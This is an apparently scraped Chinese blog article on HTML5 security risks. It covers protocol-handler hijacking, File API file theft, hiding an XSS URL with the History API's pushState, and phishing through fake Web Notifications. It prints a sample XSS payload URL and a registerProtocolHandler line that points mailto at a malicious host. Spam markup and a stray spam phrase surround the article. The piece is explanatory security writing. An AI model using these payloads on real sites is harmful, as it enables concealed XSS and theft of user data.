<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                ??一站式輕松地調用各大LLM模型接口,支持GPT4、智譜、豆包、星火、月之暗面及文生圖、文生視頻 廣告
                ? ? ? HTML5里有許多協議、模式和API,可能成為攻擊者的攻擊途徑。 ? ? ??**一、registerProtocolHandler:信息泄漏** ? ? ??HTML5允許某些協議和schema注冊為新的特性。例如下面的語句可以注冊一個email handler。 ~~~ navigator.registerProtocolHandler(“mailto”,“http://www.f.com/?uri=%s", “Evil Mail"); ~~~ ? ? ? 它會將一個惡意網站處理器關聯到mailto這個協議上,所以它在某些情況下的濫用會導致用戶信息泄漏。 ? ? ??**二、文件API:竊取文件** ? ? ??HTML5另外一些API從安全角度來看很有意思,它們還能混合起來使用。 ? ? ??例如文件API允許瀏覽器訪問本地文件,攻擊者可以將它與[點擊劫持](http://blog.csdn.net/hfahe/article/details/8138728)和其他攻擊混合起來獲得用戶本地的文件。比如騙取你從本地拖放文件到頁面里,這種方法在[劫持攻擊](http://blog.csdn.net/hfahe/article/details/8138728)一文中有較詳細的闡述。 ? ? ??**三、歷史API:隱藏XSS URL** ? ? ??利用HTML5歷史API的pushState,可以隱藏瀏覽器地址欄的攻擊URL。例如我在瀏覽器地址欄輸入 ~~~ http://test.baidu.com/?text=</div><script>history.pushState({},'',location.href.split("?").shift());document.write(1)</script> ~~~ ? ? ? 這個地址,用戶將會僅僅只看到[http://test.baidu.com/](http://test.baidu.com/)。 ? ? ??這個問題和現在流行的短網址技術結合起來,具有更大的隱蔽性。想象一下我們在微博上看到一個短網址,不會有任何懷疑就會點擊這個地址查看內容,而最后看到的地址也是相當正常的,但是在這個過程中用戶的信息和資料就不知不覺被盜取了。 ![](https://box.kancloud.cn/2016-08-09_57a9aa5665ef7.jpg) 短URL結合歷史API的攻擊 ? ? ??**四、Web Notifications:盜取數據** ? ? ??[Web Notifications](http://dvcs.w3.org/hg/notifications/raw-file/tip/Overview.html)讓我們在瀏覽器中能夠接收推送的消息通知,但是它有可能會被攻擊者利用來構造虛假信息,騙取用戶數據。 ? ? ??例如下圖里右下角的彈窗通知看起來非常正常,需要我們輸入Gmail密碼來登錄查看新郵件。但是一旦輸入密碼,Gmail郵箱就被盜取了。我們可以仔細看看,彈窗左上角顯示的域名是gmai1.com!這正是一個釣魚網站的欺詐手段。 ![](https://box.kancloud.cn/2016-08-09_57a9aa56792d9.jpg) 桌面通知攻擊 ? ? ??最后,隨著HTML5的發展,未來還可能出現新的HTML5安全問題,還可能還會向著復雜化和智能化去發展。 ? ? ??相關文章: ? ? ??《[關注HTML5安全風險](http://blog.csdn.net/hfahe/article/details/7960705)》 ? ? ??《[HTML5安全風險詳析之一:CORS攻擊](http://blog.csdn.net/hfahe/article/details/7961566)》 ? ? ??《[HTML5安全風險詳析之二:WebStorage攻擊](http://blog.csdn.net/hfahe/article/details/7961618)》 ? ? ??《[HTML5安全風險詳析之三:WebSQL攻擊](http://blog.csdn.net/hfahe/article/details/8049414)》 ? ? ??《[HTML5安全風險詳析之四:Web Worker攻擊](http://blog.csdn.net/hfahe/article/details/8104263)》 ? ? ??《[HTML5安全風險詳析之五:劫持攻擊](http://blog.csdn.net/hfahe/article/details/8138728)》 ? ? ??本文為原創文章,轉載請注明:來自[蔣宇捷的博客](http://blog.csdn.net/hfahe):[http://blog.csdn.net/hfahe](http://blog.csdn.net/hfahe)
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看